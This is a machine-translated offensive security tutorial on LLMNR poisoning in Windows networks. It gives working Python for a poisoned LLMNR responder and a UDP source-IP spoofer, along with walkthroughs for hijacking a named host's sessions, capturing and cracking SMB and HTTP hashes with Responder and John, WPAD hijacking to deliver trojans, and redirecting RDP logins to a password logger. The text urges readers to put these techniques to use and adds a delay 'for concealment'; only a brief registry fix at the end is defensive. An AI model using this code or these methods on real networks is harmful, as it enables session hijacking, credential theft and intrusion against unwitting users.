Use LLMNR name resolution defects to hijack a specified host session in the Intranet

Use LLMNR name resolution defects to hijack a specified host session in the Intranet

This article will analyze the LLMNR protocol and use Python to implement question and response. The second part focuses on some ideas about using LLMNR defects in the name parsing process for actual attacks.

The title of each section in this article is as follows:

0x00 LLMNR introduction 0x01 LLMNR protocol analysis 0x02 LLMNR name parsing process 0x03 programming implementation LLMNR question and response 0x04 LLMNR Poison attack principle 0x05 use forgery source IP + LLMNR challenge one hijacking the Intranet specified host session 0x06 LLMNR Poison actual attack ideas 0x07 Summary

0x00 LLMNR Overview

Since Windows Vista, the Windows operating system supports a new name resolution protocol called LLMNR, which is mainly used for name resolution in LAN. LLMNR supports both IPv4 and IPv6, so it is second only to DNS in the order of name resolution in Windows. More importantly, LLMNR is also implemented in Linux.

0x01 LLMNR protocol analysis

The LLMNR protocol is defined in RFC 4795. This document details the structure, configuration, and security of the LLMNR protocol.

Shows the protocol structure of LLMNR:

Figure 1: LLMNR protocol structure

The fields in the LLMNR protocol structure are described as follows:

ID-Transaction ID is a randomly generated 16-bit identifier used to identify the question and response. QR-0 indicates the query, and 1 indicates the response OPCODE-. It is a four-digit field used to specify the query type in this message. The value of this field is set and copied to the response message when the query is initiated. This specification defines the behavior of standard queries and responses (the OPCODE value is zero. Other Opcodes can be defined in LLMNR in Future specifications. C-conflict bit. TC-truncation bit. T-tentative, without sign. Z-Reserved Bit. RCODE-response code. QDCOUNT-16-bit unsigned integer that specifies the number of entries in the question section. ANCOUNT-16-bit unsigned integer that specifies the number of resource records in the Response Section. NSCOUNT-16-bit unsigned integer that specifies the number of server resource records in the authoritative record section. ARCOUNT-16-bit unsigned integer that specifies the number of resource records in the additional Records Section.

A complete and normal LLMNR name parsing process is shown in:

Note: Assume that host B has been added to multicast groups.

Figure 2: A complete and normal LLMNR name parsing process

During LLMNR name resolution, the transmission protocol is UDP. The IPv4 broadcast address is-224.0.0.252, And the IPv6 broadcast address is-FF02: 0: 0: 0: 0: 0: 0: 1: 3 or FF02: 1: 3. The listening port on the host is UDP/5355.

Use Wireshark to capture a complete packet from the LLMNR query/response process, as shown in:

Figure 3: A complete LLMNR query/response process packet

As you can see, the packets numbered No. 3 and No. 4 prove that host A broadcast IPv4 addresses and IPv6 addresses to IPv4 addresses and IPv6 addresses respectively, the TID of the data packet to be queried is 0xc7f7. The queried address type is the IPv4 address of the Request Host B, which can be different from A or AAAA. One A indicates that the requested address type is IPv4 address, and four A (AAAA) indicates that the requested address type is IPv6 address.

The packet number No. 5 proves that host B (192.168.16.130) received the request packet and found that there was A host requesting its own IP address, so it sent A unicast response to host, the IP address is unicast to host A. The address type of the response is IPv4, And the TID value of the packet is TID -- 0xc7f7 of the packet that hosts A broadcast.

The detailed structure of the queried data packet is shown in:

Figure 4: detailed structure of the queried data packet

The detailed structure of the response data packet is shown in:

Figure 5: detailed structure of the response data packet

0x03 Programming to Implement LLMNR inquiry and response

Through the above content, you can intuitively understand the detailed process of name resolution by LLMNR. Using Python, you can quickly implement the question and response programming of LLMNR protocol.

The LLMNR protocol is actually a broadcast. View the Code directly.

The question code is as follows:

LLMNR Query Demo Code

#/usr/bin/env python __doc__ = """     LLMNR Query ,                    by Her0in """ import socket, struct class LLMNR_Query:    def __init__(self,name):        self.name = name         self.IsIPv4 = True        self.populate()    def populate(self):        self.HOST = '224.0.0.252' if self.IsIPv4 else 'FF02::1:3'        self.PORT = 5355        self.s_family = socket.AF_INET if self.IsIPv4 else socket.AF_INET6         self.QueryType = "IPv4"        self.lqs = socket.socket(self.s_family, socket.SOCK_DGRAM)         self.QueryData = (        "\xa9\xfb"  # Transaction ID        "\x00\x00"  # Flags Query(0x0000)? or Response(0x8000) ?        "\x00\x01"  # Question        "\x00\x00"  # Answer RRS        "\x00\x00"  # Authority RRS        "\x00\x00"  # Additional RRS        "LENGTH"    # length of Name        "NAME"      # Name        "\x00"      # NameNull        "TYPE"      # Query Type ,IPv4(0x0001)? or IPv6(0x001c)?        "\x00\x01") # Class        namelen = len(self.name)        self.data = self.QueryData.replace('LENGTH', struct.pack('>B', namelen))        self.data = self.data.replace('NAME', struct.pack(">"+str(namelen)+"s", self.name))        self.data = self.data.replace("TYPE",  "\x00\x01" if self.QueryType == "IPv4" else "\x00\x1c")     def Query(self):        while(True):            print "LLMNR Querying... -> %s" % self.name            self.lqs.sendto(self.data, (self.HOST, self.PORT))        self.lqs.close() if __name__ == "__main__":    llmnr = LLMNR_Query("Wooyun")    llmnr.Query()

To respond to the query request of the LLMNR protocol, first add the local machine to the multicast (or multicast) group. The protocol used is IGMP. The specific programming method can directly construct data packets to send using UDP, or use the setsockopt function provided by socket to set.

The answer implementation method is very simple. Create a UDP socket and use the setsockopt function to join multicast groups and listen to port 5355. Of course, you can also use the non-blocking SocketServer module to achieve better results.

The Code is as follows:

LLMNR Answer Demo Code

#/usr/bin/env python __doc__ = """     LLMNR Answer ,                    by Her0in """ import socket, struct class LLMNR_Answer:    def __init__(self, addr):         self.IPADDR  = addr        self.las = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)        self.init_socket()        self.populate()    def populate(self):         self.AnswerData = (            "TID"               # Tid            "\x80\x00"          # Flags  Query(0x0000)? or Response(0x8000) ?            "\x00\x01"          # Question            "\x00\x01"          # Answer RRS            "\x00\x00"          # Authority RRS            "\x00\x00"          # Additional RRS            "LENGTH"            # Question Name Length            "NAME"              # Question Name            "\x00"              # Question Name Null            "\x00\x01"          # Query Type ,IPv4(0x0001)? or IPv6(0x001c)?            "\x00\x01"          # Class            "LENGTH"            # Answer Name Length            "NAME"              # Answer Name            "\x00"              # Answer Name Null            "\x00\x01"          # Answer Type ,IPv4(0x0001)? or IPv6(0x001c)?            "\x00\x01"          # Class            "\x00\x00\x00\x1e"  # TTL Default:30s            "\x00\x04"          # IP Length            "IPADDR")           # IP Address     def init_socket(self):        self.HOST = "0.0.0.0"        self.PORT = 5355        self.MulADDR  = "224.0.0.252"        self.las.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)        self.las.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)        self.las.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,                       socket.inet_aton(self.MulADDR) + socket.inet_aton(self.HOST))     def Answser(self):        self.las.bind((self.HOST, self.PORT))        print "Listening..."        while True:            data, addr = self.las.recvfrom(1024)             tid = data[0:2]            namelen = struct.unpack('>B', data[12])[0]            name = data[13:13 + namelen]             data = self.AnswerData.replace('TID', tid)            data = data.replace('LENGTH', struct.pack('>B', namelen))            data = data.replace('NAME', name)            data = data.replace('IPADDR', socket.inet_aton(self.IPADDR))             print "Poisoned answer(%s) sent to %s for name %s " % (self.IPADDR, addr[0], name)            self.las.sendto(data, addr)         self.las.setsockopt(socket.IPPROTO_IP, socket.IP_DROP_MEMBERSHIP,                       socket.inet_aton(self.MulADDR) + socket.inet_aton(self.HOST))        self.las.close() if __name__ == "__main__":    llmnr = LLMNR_Answer("11.22.33.44")    llmnr.Answser()

The final execution result is shown in:

Figure 6: Implement LLMNR query and response in Python 1

The host name used to query a simulated host is calledWooyunResult

Figure 7: Implement LLMNR query and response in Python 2

0x04 LLMNR Poison attack Principle

Figure 2 shows a complete and normal LLMNR query/response process. Since LLMNR uses a connectionless UDP protocol to send a broadcast, the host in the multicast group can then respond to the host that initiates name resolution. Therefore, in this process, attackers can take advantage of this vulnerability.

An attacker can add a host to a multicast group. When receiving a name resolution request from another host, the attacker can send a "malicious" response to the host that initiates the name resolution request. The method for exploiting this vulnerability is calledLLMNR Poison attack.

Shows the "malicious" response process:

Figure 8: "malicious" Response Process

The biggest drawback of LLMNR name resolution is that, in the current LAN, no matter whether host B exists (assuming the machine name is: SECLAB-HER0IN), as long as there is a host requestSECLAB-HER0INThe LLMNR name will be parsed once.

0x05 use counterfeit source IP address + LLMNR challenge one to hijack the specified host session on the Intranet

Because UDP is connectionless, there is no three-way handshake process. Therefore, during LLMNR name parsing, the security of UDP is highlighted. An attacker can counterfeit the source IP address and send an LLMNR name resolution question to the broadcast address. Then, the attacker can respond to the question, which is completely a "self-directed" scene.

The code for modifying the UDP source IP address is as follows:

UDP Source IP Spoof Demo Code

#/usr/bin/env python __doc__ = """     UDP Source IP Spoof ,                    by Her0in """ import socket, timefrom impacket import ImpactDecoder, ImpactPacket def UDPSpoof(src_ip, src_port, dst_ip, dst_port, data):    ip = ImpactPacket.IP()    ip.set_ip_src(src_ip)    ip.set_ip_dst(dst_ip)     udp = ImpactPacket.UDP()    udp.set_uh_sport(src_port)    udp.set_uh_dport(dst_port)     udp.contains(ImpactPacket.Data(data))    ip.contains(udp)     s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_UDP)    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)    s.sendto(ip.get_packet(), (dst_ip, dst_port)) if __name__ == "__main__":    QueryData = (        "\xa9\xfb"  # Transaction ID        "\x00\x00"  # Flags Query(0x0000)? or Response(0x8000) ?        "\x00\x01"  # Question        "\x00\x00"  # Answer RRS        "\x00\x00"  # Authority RRS        "\x00\x00"  # Additional RRS        "\x09"      # length of Name        "Her0in-PC"    # Name        "\x00"      # NameNull        "\x00\x01"  # Query Type ,IPv4(0x0001)? or IPv6(0x001c)?        "\x00\x01") # Class     ip_src = "192.168.169.1"    ip_dst = "224.0.0.252"     while True:        print("UDP Source IP Spoof %s => %s for Her0in-PC" % (ip_src, ip_dst))        UDPSpoof(ip_src, 18743,ip_dst , 5355, QueryData)        time.sleep(3)

In order not to be so violent, add a latency. In fact, the default ttl in the llmnr response packet is 30 s, so in practice, the latency can be increased for concealment.

The attack process is as follows:

Attacker (IP: 111.111.111.111) spoofed victim (IP: 222.222.222.222) sends LLMNR inquiry to broadcast address of LLMNR protocol, request resolution name: HER0IN-PC (IP: 333.333.333.333) IP attacker (IP: 111.111.111.111) join the multicast group to receive a request from the "victim", respond to the question, and unicast the IP address (which can be any IP address) to the victim.

The attack results in that the victim only needs to use the computer name for access.HER0IN-PCAny service on this host will be redirected to the IP address specified by the attacker.

The test environment is as follows:

Attacker host IP Address: 192.168.169.5 (launch of malicious programs with forged IP addresses for LLMNR broadcast and LLMNR response programs) Victim IP Address: 192.168.169.1 no operation is required. When a victim accesses the WEB service of a host on the Intranet, It is redirected to the WEB server of the attacker host.

When you look at the image, the image information is large ;)

Figure 9: The attacker host starts the corresponding program and provides WEB Services

Figure 10: when a victim accessesWin2k3-3a85d681The WEB Service of this host is redirected to the WEB server of the attacker host.

Figure 11: we can see that the WEB Server that the victim originally intended to access is Windows Server 2003, but the victim is "redirected" to a Linux host.

There are so many questions about how to use the spoofed source IP address + LLMNR challenge one to hijack the specified host session on the Intranet. The image information is large. please sort out the information and use this attack method to do a lot of things, the rest depends on free use ;)

0x06 LLMNR Poison attack ideas

In a LAN, name resolution is performed frequently. If a computer name is used, the NetBIOS name or a non-FQDN domain name is used, such as PING the host name, use the host name to connect to various services. NetBIOS and LLMNR are also enabled by default in Windows. This increases the practical value of the LLMNR Poison attack. However, in practice, LLMNR Poison attacks may encounter some problems. For example, port 5355 is occupied and the firewall is blocked. However, these minor problems can be solved. There are also some uncontrollable objective factors, such as network stability. However, these problems are not very common and cannot be solved.

The following provides several LLMNR Poison attack ideas available in practice. Use Responder as an attack tool for demonstration.

Hijack session to obtain HASH

Attackers can obtain the victim's HASH through hijacking sessions. There are two common attack scenarios.

Hijack SMB session to obtain HASH
Using LLMNR Poison to hijack SMB sessions is similar to SMBRelay attacks. Essentially, SMB sessions are hijacked, but SMBRelay attacks are passive attacks, the SMB session hijacked by an attacker can only obtain the permissions of the target server if the session itself is a successful session. Use LLMNR Poison to hijack SMB sessions. A host can obtain the HASH of the host that initiates the sharing request as long as it accesses the sharing of other hosts using the computer name. However, this HASH can only be used for brute-force attacks (because the challenge is known) and cannot be directly logged on to the host. It can combine LLMNR Poison attacks with SMBRelay attacks to improve the attack capability. Obtain HASH using HTTP 401 Authentication
You can also obtain the HASH of the client machine through HTTP 401 authentication.

Attack methods:

In combination with social engineering, deceiving the victim to access a normal but embedded similarOr. When a victim accesses a webpage, if the system version of the victim host is Vista, LLMNR name resolution is generated. At this time, the attacker's host (which has started the Responder) will receive the HASH of the victim's host. Of course, you can also enable Responder to listen all the time without any additional operations. As long as a host uses a computer name to request SMB or WEB services, it can get the HASH of the corresponding host.

Figure 12: Obtain HASH through SMB session hijacking

Figure 13: use John to crack the HASH generated by SMB session hijacking

Hijack session for phishing

Use the HTTP 401 authentication server for phishing.

Figure 14: HTTP 401 authentication server phishing

Figure 15: The "phishing" attack obtains the HASH

Hijack WPAD to obtain Internet records

In Windows, WPAD is enabled by default.IE browser-tools-internet-connection-LAN Settings-Automatic Detection settingsAnd in system servicesWinHttpAutoProxySvcService.

The host with WPAD enabled will continuously request the nameWPADTherefore, you can use LLMNR Poison to change the browser proxy settings of the victim host. In this way, attackers can view the victim's online browsing records on their own proxy servers, or embed any malicious script code you want to embed into the victim's webpage, such as phishing, pop-up box authentication and file download. In addition, because WPAD is a system's HTTP proxy settings, Windows updates will also use this proxy, so that you can use Windows updates to download Trojans to the victim's host and automatically execute them.

However, in practice, WPAD is also affected by various uncontrollable objective factors. The effect of accessing the Internet through the WPAD proxy is obvious only when the browser proxy configuration is set manually.

Get the server password

As mentioned above, in the LAN, as long as a host uses the name request service of another host, it can produce name resolution behavior. Suppose there is such a scenario where the conditions for further penetration into the Intranet are harsh. At this time, you are "poor" (: 0), in order to get a server in the Intranet, to "gain a firm foothold ". Maybe you can use the idea of "leeching and leeching" to use LLMNR Poison attacks to perform 3389 connection spoofing and get the server password. This is indeed a little risky, but it is always better If you directly modify the IP address to cheat the login (someone has done this ~,~!).

The test environment is as follows:

One Windows Server 2008 (Win2k8 supports LLMNR) as Administrator Host IP: 172.16.0.8 One Windows Server 2003 (assuming an intranet Server) machine name: WIN2K3-3A85D681 IP: 172.16.0.3 One Windows XP (3389 for demonstration purposes) IP: 172.16.0.100 one BT5-R3 attacker's host (start Responder) IP: 172.16.0.128

The scenario is as follows:

The Administrator's host (Win2k8) connected to the internal network server (Win2k3) for regular maintenance, attackers (BT5-R3) using LLMNR Poison attack hijacked 3389 connection session,To demonstrate the attack effect more clearly, I redirected the 3389 connection session to an XP Server..

OK, look at the figure to speak;), the attack effect is as follows:

Figure 16: The Administrator (Win2k8) connects to the Intranet server (Win2k3), but is hijacked by LLMNR Poison attack and redirected to XP.

Figure 17: From the attacker's machine, we can also see that the Responder has made a "malicious" response. At the same time, using lcx to forward 3389, there are also data streams running, which can be determined from the IP address.

Figure 18: a logon password logging program has been installed in XP. You can record any successful or failed logon information: D. the logon information entered by the Administrator is displayed.

0x07 Summary

There are many practical ideas about LLMNR Poison attacks, including hijacking FTP, MySQL, and MSSQL Server. Please make full use of the specific implementation.

To prevent LLMNR Poison attacks, you can import the following registry key value to disable LLMNR:

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /freg add "HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /f 

However, after LLMNR is disabled, some normal user needs may be affected ,:)